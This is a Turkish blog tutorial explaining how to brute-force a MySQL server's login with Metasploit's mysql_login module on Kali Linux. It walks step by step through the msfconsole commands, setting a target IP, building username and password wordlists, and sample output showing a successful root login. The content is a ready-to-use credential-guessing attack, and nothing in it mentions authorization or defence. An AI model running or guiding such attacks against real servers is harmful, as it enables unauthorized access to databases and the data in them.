Mysql şifresini bulmak istediğimiz bir sunucu ya da mysql kullanıcısı olduğunu düşünelim , şifreyi brute force yöntemi ile zorlayarak bulacağız , elimizde bir kullanıcı adı listesi ve bir de şifre listesi olsun , bu k.adı ve şifreleri hazır da bulabilirsiniz , kendinizde dilediğiniz algoritmaya göre farklı araçlar ile üretebilirsiniz , amacımız bu şifreleri metasploit ile mysql sunucusunda hızlıca denemek , işlem için metasploit i hazır bulunduran kali linux kullanacağız.
Öncelikle msfconsolu açalım.
root@ayhanarda:~# service postgresql start
root@ayhanarda:~# service metasploit start
root@ayhanarda:~# msfconsole
Şimdi msf console umuz açılmış durumda. Şimdi bu şifre denemelerini yapacak auxiliary modülümüzü açalım.
msf > use auxiliary/scanner/mysql/mysql_login
Şifre denemesi yapmak istediğimiz mysql serverın ip adresinin 192.168.1.10 olduğunu varsayalım. Şimdi msf üzerinde bunu set edelim.
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.10
Şimdi denenmesi için hazırladığımız k.adlarını içeren dosyamızın yolunu gösterelim.
msf auxiliary(mysql_login) > set USER_FILE /root/user.lst
Bu dosyayı önceden hazırlayabilirsiniz , içeriği aşağıdaki gibi her satıra bir k.adı gelecek şekilde olmalı.
root@ayhanarda:~# cat /root/user.lst
admin
root
user
root_user
isimleri çoğaltabilirsiniz ya da k. adını zaten biliyorsanız sadece onu yazabilirsiniz.
Şimdi aynı şekilde şifreler içeren dosyamızın yolunu set edelim.Yol değişiklik gösterebilir , kali üzerinde dilediğiniz yolda oluşturabilir ve yolun ubuna göre set edebilirsiniz.
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.lst
Şifre dosyasında her satıra bir denenecek şifre gelecek şekilde hazır olmalı.
root@ayhanarda:~# cat /root/pass.lst
password
123456
12345678
1234
qwerty
12345
dragon
ayhanarda
baseball
football
letmein
monkey
696969
Şimdi herşey tamam ise auxilary modulümüzü çalıştırmamız yeterli. Komutu verdikten sonra set ettiğimiz ip adresindeki myql servera dosyalarda belirtilen k.adları ve şifreler ile erişmeye çalışacak ve eğer sunucunun mysql şifresi dosyalarda yazanlardan biri ise Size bunu belirtecek. Çalıştırmak için aşağıdaki komutu kullanabilirsiniz.
msf auxiliary(mysql_login) > run
Şimdi sonuçlar aşağıdakine benzer olmalı ve görüldüğü gibi şifre ayhanarda imiş.
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:password(Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:123456 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:12345678 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:1234 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:qwerty (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:dragon (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[+] 192.168.1.10:3306 MYSQL – Success: ‘root:ayhanarda‘
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Ayhan ARDA
Bir yanıt yazın